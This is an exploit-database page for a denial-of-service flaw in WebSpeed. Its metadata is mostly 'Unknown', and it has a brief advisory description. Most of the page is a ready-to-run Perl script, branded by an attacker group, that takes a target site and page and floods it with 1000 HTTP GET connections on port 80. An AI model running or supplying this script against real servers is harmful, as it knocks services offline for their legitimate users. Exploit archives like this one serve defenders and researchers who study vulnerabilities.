header-logo
Suggest Exploit
vendor:
Unknown
by:
Unknown
N/A
CVSS
N/A
Denial-of-Service
Unknown
CWE
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

WebSpeed Denial-of-Service Vulnerability

WebSpeed is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. Successful exploits can allow attackers to cause the application to become unresponsive, denying service to legitimate users.

Mitigation:

Unknown
Source

Exploit-DB raw data:

//source: https://www.securityfocus.com/bid/23778/info
//
//WebSpeed is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.
//
//Successful exploits can allow attackers to cause the application to become unresponsive, denying service to legitimate users. 

if(!$ARGV[0]){
        print "U.LP.O.W\n";
        print "www.ulpow.net\n";
        print "The Eliminators of the Web\n";
        print "Usage:perl webspeed.pl targetsite targetpage\n";

} else {

$site = $ARGV[0];
$page = $ARGV[1];

print "Attack Started\n";

$ish=1;

do {
$ish++;
use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $site,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Couldn't Connect to target please check again
address!\n";
print $socket "GET $page HTTP/1.0\r\n";
close($socket);
} while ($ish < 1000);

print ":-; Attack Complete\n";
}